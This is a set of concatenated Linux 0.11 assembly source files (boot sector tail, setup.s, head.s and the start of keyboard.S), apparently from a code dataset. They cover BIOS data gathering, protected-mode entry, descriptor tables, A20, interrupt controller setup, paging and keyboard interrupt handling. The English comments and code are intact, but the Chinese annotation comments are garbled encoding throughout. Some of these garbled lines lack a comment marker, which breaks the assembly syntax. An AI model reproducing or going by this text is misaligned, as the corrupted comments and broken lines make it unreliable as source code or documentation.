mov head,ax ! 浱ǰͷš
xor ax,ax ! 嵱ǰŵѶ
ok3_read:
mov sread,ax ! 浱ǰŵѶ
shl cx,#9 ! ϴѶ*512 ֽڡ
add bx,cx ! ǰݿʼλá
jnc rp_read ! С64KB ֵ߽תrp_read(156 )ݡ
! ǰΣΪһ
mov ax,es
add ax,#0x1000 ! λַΪָһ64KB ڴ档
mov es,ax
xor bx,bx ! ݿʼƫֵ
jmp rp_read ! תrp_read(156 )ݡ
! ǰŵָʼݵes:bx ʼμ67 ¶BIOS ̶ж
! int 0x13ah=2 ˵
! al C es:bx C ʼλá
read_track:
push ax
push bx
push cx
push dx
mov dx,track ! ȡǰŵš
mov cx,sread ! ȡǰŵѶ
inc cx ! cl = ʼ
mov ch,dl ! ch = ǰŵš
mov dx,head ! ȡǰͷš
mov dh,dl ! dh = ͷš
mov dl,#0 ! dl = (Ϊ0 ʾǰ)
and dx,#0x0100 ! ͷŲ1
mov ah,#2 ! ah = 2ܺš
int 0x13
jc bad_rt ! תbad_rt
pop dx
pop cx
pop bx
pop ax
ret
! ִλжϹܺ0תread_track ԡ
bad_rt: mov ax,#0
mov dx,#0
int 0x13
pop dx
pop cx
pop bx
pop ax
jmp read_track
/*
 * This procedure turns off the floppy drive motor, so
 * that we enter the kernel in a known state, and
 * don't have to worry about it later.
 */
kill_motor:
push dx
mov dx,#0x3f2 ! floppy controller DOR port (write-only)
mov al,#0 ! deselect drive, stop motor, disable DMA/IRQ
outb ! write al to the port in dx
pop dx
ret
sectors:
.word 0 ! sectors per track, filled in by ok_load_setup
msg1:
.byte 13,10 ! CR, LF
.ascii "Loading system ..."
.byte 13,10,13,10 ! 24 characters in total
.org 508 ! place root_dev at byte 508 (0x1FC)
root_dev:
.word ROOT_DEV ! root filesystem device (read by init/main.c)
boot_flag:
.word 0xAA55 ! boot-sector signature checked by the BIOS
.text
endtext:
.data
enddata:
.bss
endbss:
|
Akagi201/linux-0.11
| 8,163
|
boot/setup.s
|
!
! setup.s (C) 1991 Linus Torvalds
!
! setup.s is responsible for getting the system data from the BIOS,
! and putting them into the appropriate places in system memory.
! both setup.s and system has been loaded by the bootblock.
!
! This code asks the bios for memory/disk/other parameters, and
! puts them in a "safe" place: 0x90000-0x901FF, ie where the
! boot-block used to be. It is then up to the protected mode
! system to read them from there before the area is overwritten
! for buffer-blocks.
!
! setup.s BIOS лȡϵͳݣЩݷŵϵͳڴʵط
! ʱsetup.s system Ѿbootsect صڴС
!
! δѯbios йڴ//Щŵһ
! ȫġط0x90000-0x901FFҲԭbootsect
! ĵطȻڱ鸲ǵ֮ǰɱģʽsystem ȡ
!
! NOTE! These had better be the same as in bootsect.s!
! Щúbootsect.s еͬ
INITSEG = 0x9000 ! we move boot here - out of the way ! ԭbootsect ĶΡ
SYSSEG = 0x1000 ! system loaded at 0x10000 (65536). ! system 0x10000(64k)
SETUPSEG = 0x9020 ! this is the current segment ! ڵĶεַ
.globl begtext, begdata, begbss, endtext, enddata, endbss
.text
begtext:
.data
begdata:
.bss
begbss:
.text
entry start
start:
! ok, the read went well so we get current cursor position and save it for
! posterity.
! ok̶̹ڽλñԱʹá
mov ax,#INITSEG ! this is done in bootsect already, but...
! ds ó#INITSEG(0x9000)Ѿbootsect
! ùsetup Linus Ҫ
! һ¡
mov ds,ax
mov ah,#0x03 ! read cursor pos
! BIOS ж0x10 Ķ깦ܺ ah = 0x03
! 룺bh = ҳ
! أch = ɨ迪ʼߣcl = ɨߣ
! dh = к(0x00 Ƕ)dl = к(0x00 )
xor bh,bh
int 0x10 ! save it in known place, con_init fetches
mov [0],dx ! it from 0x90000.
! ˵λϢ0x90000 ̨
! ʼʱȡ
! Get memory size (extended mem, kB) ! 3 ȡչڴĴСֵKB
! ǵж0x15ܺah = 0x88
! أax = 0x1000001MʼչڴС(KB)
! CF λax = 롣
mov ah,#0x88
int 0x15
mov [2],ax ! չڴֵ0x90002 1 ֣
! Get video-card data: ! ȡʾǰʾģʽ
! BIOS ж0x10ܺ ah = 0x0f
! أah = ַal = ʾģʽbh = ǰʾҳ
! 0x90004(1 )ŵǰҳ0x90006 ʾģʽ0x90007 ַ
mov ah,#0x0f
int 0x10
mov [4],bx ! bh = display page
mov [6],ax ! al = video mode, ah = window width
! check for EGA/VGA and some config parameters ! ʾʽEGA/VGAȡ
! BIOS ж0x10ӹѡ -ȡʽϢ
! ܺţah = 0x12bl = 0x10
! أbh = ʾ״̬
! (0x00 - ɫģʽI/O ˿=0x3dX)
! (0x01 - ɫģʽI/O ˿=0x3bX)
! bl = װʾڴ
! (0x00 - 64k, 0x01 - 128k, 0x02 - 192k, 0x03 = 256k)
! cx = ʾԲ(μ˵)
mov ah,#0x12
mov bl,#0x10
int 0x10
mov [8],ax ! 0x90008 = ??
mov [10],bx ! 0x9000A = װʾڴ棬0x9000B = ʾ״̬(ɫ/ɫ)
mov [12],cx ! 0x9000C = ʾԲ
! Get hd0 data ! ȡһӲ̵ϢӲ̲
! 1 Ӳַ̲Ȼж0x41 ֵ2 Ӳ
! ӵ1 ĺ棬ж0x46 ֵҲָ2 Ӳ
! IJַij16 ֽ(0x10)
! γֱBIOS йӲ̵IJ0x90080 ŵ1
! Ӳ̵ı0x90090 ŵ2 Ӳ̵ı
mov ax,#0x0000
mov ds,ax
lds si,[4*0x41] ! ȡж0x41 ֵҲhd0 ĵַ??ds:si
mov ax,#INITSEG
mov es,ax
mov di,#0x0080 ! Ŀĵַ: 0x9000:0x0080 ?? es:di
mov cx,#0x10 ! 0x10 ֽڡ
rep
movsb
! Get hd1 data
mov ax,#0x0000
mov ds,ax
lds si,[4*0x46] ! ȡж0x46 ֵҲhd1 ĵַ??ds:si
mov ax,#INITSEG
mov es,ax
mov di,#0x0090 ! Ŀĵַ: 0x9000:0x0090 ?? es:di
mov cx,#0x10
rep
movsb
! Check that there IS a hd1 :-) ! ϵͳǷڵ2 Ӳ̣2 㡣
! BIOS жϵ0x13 ȡܡ
! ܺ ah = 0x15
! 룺dl = ţ0x8X Ӳ̣0x80 ָ1 Ӳ̣0x81 2 Ӳ̣
! ah = 룻00 --ụ̂CF λ 01 --ûchange-line ֧֣
! 02 --(ƶ豸)change-line ֧֣ 03 --Ӳ̡
mov ax,#0x01500
mov dl,#0x81
int 0x13
jc no_disk1
cmp ah,#3 ! Ӳ( = 3 )
je is_disk1
no_disk1:
mov ax,#INITSEG ! 2 Ӳ̲ڣԵ2 Ӳ̱㡣
mov es,ax
mov di,#0x0090
mov cx,#0x10
mov ax,#0x00
rep
stosb
is_disk1:
! now we want to move to protected mode ... ! ↑ʼҪģʽĹˡ
cli ! no interrupts allowed ! ! ʱжϡ
! first we move the system to it's rightful place
! ǽsystem ģƵȷλá
! bootsect ǽsystem ģ뵽0x1000064kʼλáڵʱ
! system ģȲᳬ0x80000512kҲĩ˲ᳬڴַ0x90000
! bootsect ὫԼƶ0x90000 ʼĵطsetup صĺ档
! γ;ٰsystem ģƶ0x00000 λãѴ0x10000 0x8ffff
! ڴݿ(512k)ڴͶƶ0x1000064kλá
mov ax,#0x0000
cld ! 'direction'=0, movs moves forward
do_move:
mov es,ax ! destination segment ! es:di??Ŀĵַ(ʼΪ0x0000:0x0)
add ax,#0x1000
cmp ax,#0x9000 ! ѾѴ0x8000 οʼ64k ƶꣿ
jz end_move
mov ds,ax ! source segment ! ds:si??Դַ(ʼΪ0x1000:0x0)
sub di,di
sub si,si
mov cx,#0x8000 ! ƶ0x8000 ֣64k ֽڣ
rep
movsw
jmp do_move
! then we load the segment descriptors
! ˺Ǽض
! ↑ʼ32 λģʽIJҪIntel 32 λģʽ̷֪ʶ,
! йⷽϢбļܻ¼еϸ˵Ҫ˵
!
! lidt ָڼж(idt)ĴIJ6 ֽڣ0-1 ֽ
! ֵ(ֽ)2-5 ֽ32 λԻַַʽμ
! 219-220 к223-224 е˵жеÿһ8 ֽڣָжʱ
! ҪõĴϢжЩƣҪϢ
!
! lgdt ָڼȫ(gdt)Ĵʽlidt ָͬȫ
! еÿ(8 ֽ)˱ģʽݺʹΣ飩Ϣаε
! (16 λ)εԻַ32 λεȨǷڴ桢дԼ
! һЩģʽеı־μ205-216 С
!
end_move:
mov ax,#SETUPSEG ! right, forgot this at first. didn't work :-)
mov ds,ax ! ds ָ(setup)Ρ
lidt idt_48 ! load idt with 0,0
! ж(idt)Ĵidt_48 6 ֽڲλ
! (218 )ǰ2 ֽڱʾidt 4 ֽڱʾidt
! Ļַ
lgdt gdt_48 ! load gdt with whatever appropriate
! ȫ(gdt)Ĵgdt_48 6 ֽڲλ
! (222 )
! that was painless, now we enable A20
! ϵIJܼǿA20 ַߡμбйA20 źߵ˵
call empty_8042 ! ȴ뻺ա
! ֻе뻺ΪʱſԶд
mov al,#0xD1 ! command write ! 0xD1 -ʾҪдݵ
out #0x64,al ! 8042 P2 ˿ڡP2 ˿ڵλ1 A20 ߵѡͨ
! Ҫд0x60 ڡ
call empty_8042 ! ȴ뻺գǷܡ
mov al,#0xDF ! A20 on ! ѡͨA20 ַߵIJ
out #0x60,al
call empty_8042 ! 뻺ΪգʾA20 Ѿѡͨ
! well, that went ok, I hope. Now we have to reprogram the interrupts :-(
! we put them right after the intel-reserved hardware interrupts, at
! int 0x20-0x2F. There they won't mess up anything. Sadly IBM really
! messed this up with the original PC, and they haven't been able to
! rectify it afterwards. Thus the bios puts interrupts at 0x08-0x0f,
! which is used for the internal hardware interrupts as well. We just
! have to reprogram the 8259's, and it isn't fun.
!! ϣһDZ¶жϽб??
!! ǽǷôintel ӲжϺ棬int 0x20-0x2F
!! DzͻҵIBM ԭPC иˣԺҲûо
!! PC bios жϷ0x08-0x0fЩжҲڲӲжϡ
!! Ǿͱ¶8259 жϿб̣һ㶼û
mov al,#0x11 ! initialization sequence
! 0x11 ʾʼʼICW1 ֣ʾ
! شƬ8259 ҪICW4 ֡
out #0x20,al ! send it to 8259A-1 ! ͵8259A оƬ
.word 0x00eb,0x00eb ! jmp $+2, jmp $+2 ! $ ʾǰָĵַ
! תָһָʱá
out #0xA0,al ! and to 8259A-2 ! ٷ͵8259A оƬ
.word 0x00eb,0x00eb
mov al,#0x20 ! start of hardware int's (0x20)
out #0x21,al ! оƬICW2 ֣ʼжϺţҪַ
.word 0x00eb,0x00eb
mov al,#0x28 ! start of hardware int's 2 (0x28)
out #0xA1,al ! ʹоƬICW2 ֣оƬʼжϺš
.word 0x00eb,0x00eb
mov al,#0x04 ! 8259-1 is master
out #0x21,al ! оƬICW3 ֣оƬIR2 оƬINT
.word 0x00eb,0x00eb μб˵
mov al,#0x02 ! 8259-2 is slave
out #0xA1,al ! ʹоƬICW3 ֣ʾоƬINT о
! ƬIR2 ϡ
.word 0x00eb,0x00eb
mov al,#0x01 ! 8086 mode for both
out #0x21,al ! оƬICW4 ֡8086 ģʽͨEOI ʽ
! 跢ָλʼоƬ
.word 0x00eb,0x00eb
out #0xA1,al ʹоƬICW4 ֣ͬϡ
.word 0x00eb,0x00eb
mov al,#0xFF ! mask off all interrupts for now
out #0x21,al ! оƬж
.word 0x00eb,0x00eb
out #0xA1,al δоƬж
! well, that certainly wasn't fun :-(. Hopefully it works, and we don't
! need no steenking BIOS anyway (except for the initial loading :-).
! The BIOS-routine wants lots of unnecessary data, and it's less
! "interesting" anyway. This is how REAL programmers do it.
!
! Well, now's the time to actually move into protected mode. To make
! things as simple as possible, we do no register set-up or anything,
! we let the gnu-compiled 32-bit programs do that. We just jump to
! absolute address 0x00000, in 32-bit protected mode.
!! ߣεȻû??ϣܹҲҪζBIOS ˣ
!! ʼļ?BIOS ӳҪܶҪݣһ㶼ûȤǡ
!! Ա¡
! ý32 λģʽСȼػ״̬(lmsw - Load Machine Status Word)Ҳ
! ƼĴCR0λ0 1 CPU ڱģʽ
mov ax,#0x0001 ! protected mode (PE) bit ! ģʽλ(PE)
lmsw ax ! This is it! ! ػ״̬!
jmpi 0,8 ! jmp offset 0 of segment 8 (cs) ! תcs 8ƫ0
! Ѿsystem ģƶ0x00000 ʼĵطƫƵַ0Ķ
! ֵ8 ѾDZģʽµĶѡˣѡԼҪȨ
! ѡΪ16 λ2 ֽڣλ0-1 ʾȨ0-3linux ϵͳֻ
! õ0 ϵͳ3 ûλ2 ѡȫ(0)Ǿֲ
! (1)λ3-15 ָѡڼԶѡ
! 8(0b0000,0000,0000,1000)ʾȨ0ʹȫеĵ1 ָ
! Ļַ0μ209 Уתָͻȥִsystem еĴ롣
! This routine checks that the keyboard command queue is empty
! No timeout is used - if this hangs there is something wrong with
! the machine, and we probably couldn't proceed anyway.
! ӳǷΪաﲻʹóʱ -
! ˵PC ⣬Ǿûа취ٴȥˡ
! ֻе뻺Ϊʱ״̬Ĵλ2 = 0ſԶд
empty_8042:
.word 0x00eb,0x00eb ! תָĻ(תһ)൱ʱղ
in al,#0x64 ! 8042 status port ! AT ̿״̬Ĵ
test al,#2 ! is input buffer full? ! λ2뻺
jnz empty_8042 ! yes - loop
ret
gdt: ! ȫʼɶ8 ֽڳɡ
! 3 1 ã206 Уڡ2 ϵͳ
! 208-211 У3 ϵͳݶ(213-216 )ÿľ
! μб˵
.word 0,0,0,0 ! dummy ! 1 á
! gdt еƫΪ0x08شμĴ(ѡ)ʱʹõƫֵ
.word 0x07FF ! 8Mb - limit=2047 (2048*4096=8Mb)
.word 0x0000 ! base address=0
.word 0x9A00 ! code read/exec
.word 0x00C0 ! granularity=4096, 386
! gdt еƫ0x10ݶμĴ(ds )ʱʹõƫֵ
.word 0x07FF ! 8Mb - limit=2047 (2048*4096=8Mb)
.word 0x0000 ! base address=0
.word 0x9200 ! data read/write
.word 0x00C0 ! granularity=4096, 386
idt_48:
.word 0 ! idt limit=0
.word 0,0 ! idt base=0L
gdt_48:
.word 0x800 ! gdt limit=2048, 256 GDT entries
! ȫֱΪ2k ֽڣΪÿ8 ֽһ
! Աй256
.word 512+gdt,0x9 ! gdt base = 0X9xxxx
! 4 ֽڹɵڴԵַ0x0009<<16 + 0x0200+gdt
! Ҳ0x90200 + gdt(ڱеƫƵַ205 )
.text
endtext:
.data
enddata:
.bss
endbss:
|
Akagi201/linux-0.11
| 8,569
|
boot/head.s
|
/*
* linux/boot/head.s
*
* (C) 1991 Linus Torvalds
*/
/*
* head.s contains the 32-bit startup code.
*
* NOTE!!! Startup happens at absolute address 0x00000000, which is also where
* the page directory will exist. The startup code will be overwritten by
* the page directory.
*/
/*
* head.s 32 λ롣
* ע!!! 32 λǴӾԵַ0x00000000 ʼģҲͬҳĿ¼ڵĵط
* 뽫ҳĿ¼ǵ
*/
.text
.globl _idt,_gdt,_pg_dir,_tmp_floppy_area
_pg_dir: # ҳĿ¼
startup_32: # 18-22 øݶμĴ
movl $0x10,%eax # GNU ˵ÿֱҪ'$'ʼDZʾַ
# ÿĴҪ'%'ͷeax ʾ32 λax Ĵ
# ٴע!!! Ѿ32 λģʽ$0x10 ǰѵַ0x10 װ
# μĴʵȫֶеƫֵ߸ȷ˵һ
# ѡйѡ˵μsetup.s 193 µ˵$0x10 ĺ
# Ȩ0(λ0-1=0)ѡȫ(λ2=0)ѡе2 (λ3-15=2)ָ
ڵǰLinux ϵͳУgas gld ѾֱΪas ld
# еݶľֵμǰsetup.s 212213 У
# ĺǣds,es,fs,gs еѡΪsetup.s йݶΣȫֶ
# ĵ2 =0x10ջݶе_stack_start ڣȻʹµж
# ȫֶ.µȫֶгʼsetup.s еȫһ
mov %ax,%ds
mov %ax,%es
mov %ax,%fs
mov %ax,%gs
lss _stack_start,%esp # ʾ_stack_start??ss:espϵͳջ
# stack_start kernel/sched.c69 С
call setup_idt # жӳ
call setup_gdt # ȫӳ
movl $0x10,%eax # reload all the segment registers
mov %ax,%ds # after changing gdt. CS was already
mov %ax,%es # reloaded in 'setup_gdt'
mov %ax,%fs # ΪgdtҪװеĶμĴ
mov %ax,%gs # CS μĴѾsetup_gdt ¼عˡ
lss _stack_start,%esp
# 32-36 ڲA20 ַǷѾõķڴַ0x000000 д
# һֵȻڴַ0x100000(1M)ǷҲֵһֱͬĻһֱ
# ȽȥҲѭʾַA20 ûѡͨں˾Ͳʹ1M ڴ档
xorl %eax,%eax
1: incl %eax # check that A20 really IS enabled
movl %eax,0x000000 # loop forever if it isn't
cmpl %eax,0x100000
je 1b # '1b'ʾ(backward)ת1 ȥ33 У
# '5f'ʾǰ(forward)ת5 ȥ
/*
* NOTE! 486 should set bit 16, to check for write-protect in supervisor
* mode. Then it would be unnecessary with the "verify_area()"-calls.
* 486 users probably want to set the NE (#5) bit also, so as to use
* int 16 for math errors.
*/
/*
* ע! γУ486 Ӧýλ16 λԼڳûģʽµд,
* ˺"verify_area()"оͲҪˡ486 ûͨҲ뽫NE(#5)λԱ
* ѧЭijʹint 16
*/
# γ43-65ڼѧЭоƬǷڡĿƼĴCR0
# ЭִһЭָĻ˵ЭоƬڣ
# ҪCR0 еЭλEMλ2λЭڱ־MPλ1
movl %cr0,%eax # check math chip
andl $0x80000011,%eax # Save PG,PE,ET
/* "orl $0x10020,%eax" here for 486 might be good */
orl $2,%eax # set MP
movl %eax,%cr0
call check_x87
jmp after_page_tables # ת135 С
/*
* We depend on ET to be correct. This checks for 287/387.
*/
/*
* ET ־ȷ287/387
*/
check_x87:
fninit
fstsw %ax
cmpb $0,%al
je 1f /* no coprocessor: have to set bits */
movl %cr0,%eax # ڵǰת1 дcr0
xorl $6,%eax /* reset MP, set EM */
movl %eax,%cr0
ret
.align 2 # ".align 2"ĺָ洢߽"2"ʾַ2 λΪ㣬
# 4 ֽڷʽڴַ
1: .byte 0xDB,0xE4 /* fsetpm for 287, ignored by 387 */ # 287 Э롣
ret
/*
* setup_idt
*
* sets up a idt with 256 entries pointing to
* ignore_int, interrupt gates. It then loads
* idt. Everything that wants to install itself
* in the idt-table may do so themselves. Interrupts
* are enabled elsewhere, when we can be relatively
* sure everything is ok. This routine will be over-
* written by the page tables.
*/
/*
* жӳ setup_idt
*
* жidt óɾ256 ָignore_int жšȻж
* Ĵ(lidt ָ)ʵõжԺٰװطΪһ
* ʱٿжϡӳᱻҳǵ
*/
# жеȻҲ8 ֽɣʽȫֱеIJͬΪ
# (Gate Descriptor)0-1,6-7 ֽƫ2-3 ֽѡ4-5 ֽһЩ־
setup_idt:
lea ignore_int,%edx # ignore_int Чַƫֵֵ??edx Ĵ
movl $0x00080000,%eax # ѡ0x0008 eax ĸ16 λС
movw %dx,%ax /* selector = 0x0008 = cs */
# ƫֵĵ16 λeax ĵ16 λСʱeax
#4 ֽڵֵ
movw $0x8E00,%dx /* interrupt gate - dpl=0, present */
# ʱedx 4 ֽڵֵ
lea _idt,%edi # _idt жĵַ
mov $256,%ecx
rp_sidt:
movl %eax,(%edi) # жС
movl %edx,4(%edi)
addl $8,%edi # edi ָһ
dec %ecx
jne rp_sidt
lidt idt_descr # жĴֵ
ret
/*
* setup_gdt
*
* This routines sets up a new gdt and loads it.
* Only two entries are currently built, the same
* ones that were built in init.s. The routine
* is VERY complicated at two whole lines, so this
* rather long comment is certainly needed :-).
* This routine will beoverwritten by the page tables.
*/
/*
* ȫ setup_gdt
* ӳһµȫgdtءʱǰ
* һӳֻУdzġӣԵȻҪôע?
setup_gdt:
lgdt gdt_descr # ȫĴ(úã232-238 )
ret
/*
* I put the kernel page tables right after the page directory,
* using 4 of them to span 16 Mb of physical memory. People with
* more than 16MB will have to expand this.
*/
/* Linus ں˵ڴҳֱӷҳĿ¼֮ʹ4 Ѱַ16 Mb ڴ档
* ж16 Mb ڴ棬Ҫġ
*/
# ÿҳΪ4 Kb ֽڣÿҳҪ4 ֽڣһҳԴ1000
# һѰַ4 Kb ĵַռ䣬һҳͿѰַ4 Mb ڴ档
# ҳĸʽΪǰ0-11 λһЩ־Ƿڴ(P λ0)д(R/W λ1)
# ͨûdzûʹ(U/S λ2)ǷĹ(Ƿ)(D λ6)ȣλ12-31
# ҳַָһҳڴʼַ
.org 0x1000 # ƫ0x1000 ʼǵ1 ҳƫ0 ʼҳĿ¼
pg0:
.org 0x2000
pg1:
.org 0x3000
pg2:
.org 0x4000
pg3:
.org 0x5000 # ڴݿƫ0x5000 ʼ
/*
* tmp_floppy_area is used by the floppy-driver when DMA cannot
* reach to a buffer-block. It needs to be aligned, so that it isn't
* on a 64kB border.
*/
/* DMAֱӴ洢ʣܷʻʱtmp_floppy_area ڴ
* ͿɹʹáַҪͲԽ64kB ߽硣
*/
_tmp_floppy_area:
.fill 1024,1,0 # 1024 ÿ1 ֽڣֵ0
# ⼸ջ(pushl)Ϊ/init/main.c ͷ
# ǰ3 ջָ֪ʲôõģҲLinus ڵʱܿõ?
# 139 еջģmain.c ʱȽصַջIJ
# main.c ˳ʱͻ᷵صıL6 ִȥҲѭ
# 140 нmain.c ĵַѹջ÷ҳsetup_paging
# ִ'ret'ָʱͻὫmain.c ĵַջȥִmain.c ȥˡ
after_page_tables:
pushl $0 # These are the parameters to main :-)
pushl $0 # Щǵmain IJָinit/main.c
pushl $0
pushl $L6 # return address for main, if it decides to.
pushl $_main # '_main'DZmain ڲʾ
jmp setup_paging # ת198 С
L6:
jmp L6 # main should never return here, but
# just in case, we know what happens.
/* This is the default interrupt "handler" :-) */
/* Ĭϵжϡ? */
int_msg:
.asciz "Unknown interrupt\n\r" # ַδ֪ж(س)
.align 2 # 4 ֽڷʽڴַ
ignore_int:
pushl %eax
pushl %ecx
pushl %edx
push %ds # ע⣡ds,es,fs,gs Ȼ16 λļĴջ
# Ȼ32 λʽջҲҪռ4 ֽڵĶջռ䡣
push %es
push %fs
movl $0x10,%eax # öѡʹds,es,fs ָgdt еݶΣ
mov %ax,%ds
mov %ax,%es
mov %ax,%fs
pushl $int_msg # ѵprintk IJָ루ַջ
call _printk # ú/kernel/printk.c С
# '_printk'printk ģеڲʾ
popl %eax
pop %fs
pop %es
pop %ds
popl %edx
popl %ecx
popl %eax
iret # жϷأжϵʱѹջCPU ־Ĵ32 λֵҲ
/*
* Setup_paging
*
* This routine sets up paging by setting the page bit
* in cr0. The page tables are set up, identity-mapping
* the first 16MB. The pager assumes that no illegal
* addresses are produced (ie >4Mb on a 4Mb machine).
*
* NOTE! Although all physical memory should be identity
* mapped by this routine, only the kernel page functions
* use the >1Mb addresses directly. All "normal" functions
* use just the lower 1Mb, or the local data space, which
* will be mapped to some other place - mm keeps track of
* that.
*
* For those with more memory than 16 Mb - tough luck. I've
* not got it, why should you :-) The source is here. Change
* it. (Seriously - it shouldn't be too difficult. Mostly
* change some constants etc. I left it at 16Mb, as my machine
* even cannot be extended past that (ok, but it was cheap :-)
* I've tried to show which constants to change by having
* some kind of marker at them (search for "16Mb"), but I
* won't guarantee that's all :-( )
*/
/*
* ӳͨÿƼĴcr0 ı־PG λ31ڴķҳܣ
* øҳݣԺӳǰ16 MB ڴ档ҳٶǷ
* ַӳ䣨Ҳֻ4Mb Ļó4Mb ڴַ
* ע⣡еַӦӳкӳ䣬ֻںҳ
* ֱʹ>1Mb ĵַСһ㡱ʹõ1Mb ĵַռ䣬ʹþֲ
* ռ䣬ַռ佫ӳ䵽һЩطȥ -- mm(ڴ)Щµġ
* Щж16Mb ڴļһ - ̫ˣһûУΪʲô?
* İɡʵϣⲢ̫ѵġֻͨһЩȡҰΪ
* 16MbΪҵĻôܳޣȻҵĻܱ˵?
* Ѿͨij־ҪĶĵط16MbҲܱ֤Щ
* Ķ??
*/
.align 2 # 4 ֽڷʽڴַ߽硣
setup_paging: # ȶ5 ҳڴ棨1 ҳĿ¼ + 4 ҳҳ
movl $1024*5,%ecx /* 5 pages - pg_dir+4 page tables */
xorl %eax,%eax
xorl %edi,%edi /* pg_dir is at 0x000 */
# ҳĿ¼0x000 ַʼ
cld;rep;stosl
# 4 ҳĿ¼еǹ4 ҳֻ4
# ҳĿ¼ĽṹҳĽṹһ4 ֽΪ1 μ113 µ˵
# "$pg0+7"ʾ0x00001007ҳĿ¼еĵ1
# 1 ҳڵĵַ = 0x00001007 & 0xfffff000 = 0x1000
# 1 ҳԱ־ = 0x00001007 & 0x00000fff = 0x07ʾҳڡûɶд
movl $pg0+7,_pg_dir /* set present bit/user r/w */
movl $pg1+7,_pg_dir+4 /* --------- " " --------- */
movl $pg2+7,_pg_dir+8 /* --------- " " --------- */
movl $pg3+7,_pg_dir+12 /* --------- " " --------- */
# 6 д4 ҳݣУ4(ҳ)*1024(/ҳ)=4096 (0 - 0xfff)
# Ҳӳڴ 4096*4Kb = 16Mb
# ÿǣǰӳڴַ + ҳı־Ϊ7
# ʹõķǴһҳһʼ˳дһҳһҳе
# λ1023*4 = 4092һҳһλþ$pg3+4092
movl $pg3+4092,%edi # edi??һҳһ
movl $0xfff007,%eax /* 16Mb - 4096 + 7 (r/w user,p) */
# 1 Ӧڴҳĵַ0xfff000
# Ա־7Ϊ0xfff007.
std # λλedi ֵݼ(4 ֽ)
1: stosl /* fill pages backwards - more efficient :-) */
subl $0x1000,%eax # ÿдһֵַ0x1000
jge 1b # С0 ˵ȫдˡ
# ҳĿ¼ַĴcr3 ֵָҳĿ¼
xorl %eax,%eax /* pg_dir is at 0x0000 */ # ҳĿ¼0x0000
movl %eax,%cr3 /* cr3 - page directory start */
# ʹ÷ҳcr0 PG ־λ31
movl %cr0,%eax
orl $0x80000000,%eax # PG ־
movl %eax,%cr0 /* set paging (PG) bit */
ret /* this also flushes prefetch-queue */
# ڸıҳ־ҪʹתָˢԤȡָУõǷָret
# ÷ָһǽջеmain ĵַʼ/init/main.c
# ˡ
.align 2 # 4 ֽڷʽڴַ߽硣
.word 0
idt_descr: #lidt ָ6 ֽڲȣַ
.word 256*8-1 # idt contains 256 entries
.long _idt
.align 2
.word 0
gdt_descr: # lgdt ָ6 ֽڲȣַ
.word 256*8-1 # so does gdt (not that that's any
.long _gdt # magic number, but it works for me :^)
.align 3 # 8 ֽڷʽڴַ߽硣
_idt: .fill 256,8,0 # idt is uninitialized # 256 ÿ8 ֽڣ0
# ȫֱǰ4 ֱǿãݶϵͳ
# ϵͳlinux ûô滹Ԥ252 Ŀռ䣬ڷ
# ֲ(LDT)ͶӦ״̬TSS
# (0-nul, 1-cs, 2-ds, 3-sys, 4-TSS0, 5-LDT0, 6-TSS1, 7-LDT1, 8-TSS2 etc...)
_gdt: .quad 0x0000000000000000 /* NULL descriptor */
.quad 0x00c09a0000000fff /* 16Mb */ # 16M
.quad 0x00c0920000000fff /* 16Mb */ # ݶ16M
.quad 0x0000000000000000 /* TEMPORARY - don't use */
.fill 252,8,0 /* space for LDT's and TSS's etc */
|
Akagi201/linux-0.11
| 16,140
|
kernel/chr_drv/keyboard.S
|
/*
* linux/kernel/keyboard.S
*
* (C) 1991 Linus Torvalds
*/
/*
* Thanks to Alfred Leung for US keyboard patches
* Wolfgang Thiel for German keyboard patches
* Marc Corsini for the French keyboard
*/
/*
* лAlfred Leung US ̲
* Wolfgang Thiel ˵̲
* Marc Corsini ˷ļ̲
*/
#include <linux/config.h> // ںͷļԺӲͣHD_TYPEѡ
.text
.globl _keyboard_interrupt
/*
* these are for the keyboard read functions
*/
/*
* Щڼ̶
*/
// size Ǽ̻ijȣֽ
size = 1024 /* must be a power of two ! And MUST be the same
as in tty_io.c !!!! */
/* ֵ2 Ĵηtty_io.c еֵƥ!!!! */
// Щǻнṹеƫ */
head = 4 // ͷֶָƫơ
tail = 8 // βֶָƫơ
proc_list = 12 // ȴûеĽֶƫơ
buf = 16 // ֶƫơ
// mode Ǽİ״̬־
// ʾСдת(caps)(alt)Ƽ(ctrl)ͻ(shift)״̬
// λ7 caps £
// λ6 caps ״̬(Ӧleds еĶӦ־λһ)
// λ5 alt £
// λ4 alt £
// λ3 ctrl £
// λ2 ctrl £
// λ1 shift £
// λ0 shift ¡
mode: .byte 0 /* caps, alt, ctrl and shift mode */
// (num-lock)Сдת(caps-lock)(scroll-lock)LED ״̬
// λ7-3 ȫ0 ã
// λ2 caps-lock
// λ1 num-lock(ʼ1Ҳ(num-lock)Ϊ)
// λ0 scroll-lock
leds: .byte 2 /* num-lock, caps, scroll-lock mode (nom-lock on) */
// ɨ0xe0 0xe1 ʱøñ־ʾ1 2 ַɨ룬μб˵
// λ1 =1 յ0xe1 ־
// λ0 =1 յ0xe0 ־
e0: .byte 0
/*
* con_int is the real interrupt routine that reads the
* keyboard scan-code and converts it into the appropriate
* ascii character(s).
*/
/*
* con_int ʵʵжϴӳڶɨ벢ת
* Ӧascii ַ
*/
//// жϴڵ㡣
_keyboard_interrupt:
pushl %eax
pushl %ebx
pushl %ecx
pushl %edx
push %ds
push %es
movl $0x10,%eax // dses μĴΪںݶΡ
mov %ax,%ds
mov %ax,%es
xorl %al,%al /* %eax is scan code */ /* eax ɨ */
inb $0x60,%al // ȡɨ??al
cmpb $0xe0,%al // ɨ0xe0 תe0 ־봦
je set_e0
cmpb $0xe1,%al // ɨ0xe1 תe1 ־봦
je set_e1
call key_table(,%eax,4) // üker_table + eax * 4μ502 У
movb $0,e0 // λe0 ־
// δ(55-65 )ʹ8255A PC ̵·Ӳλ˿0x61
// 8255A B ĵַ˿ڵĵ7 λ(PB7)ڽֹԼݵĴ
// γڶյɨӦ𡣷Ƚֹ̣Ȼ̹
e0_e1: inb $0x61,%al // ȡPPI ˿B ״̬λ7 /ֹ(0/1)̡
jmp 1f // ӳһᡣ
1: jmp 1f
1: orb $0x80,%al // al λ7 λ(ֹ̹)
jmp 1f // ӳһᡣ
1: jmp 1f
1: outb %al,$0x61 // ʹPPI PB7 λλ
jmp 1f // ӳһᡣ
1: jmp 1f
1: andb $0x7F,%al // al λ7 λ
outb %al,$0x61 // ʹPPI PB7 λλ̹
movb $0x20,%al // 8259 жоƬEOI(жϽ)źš
outb %al,$0x20
pushl $0 // ̨tty =0Ϊջ
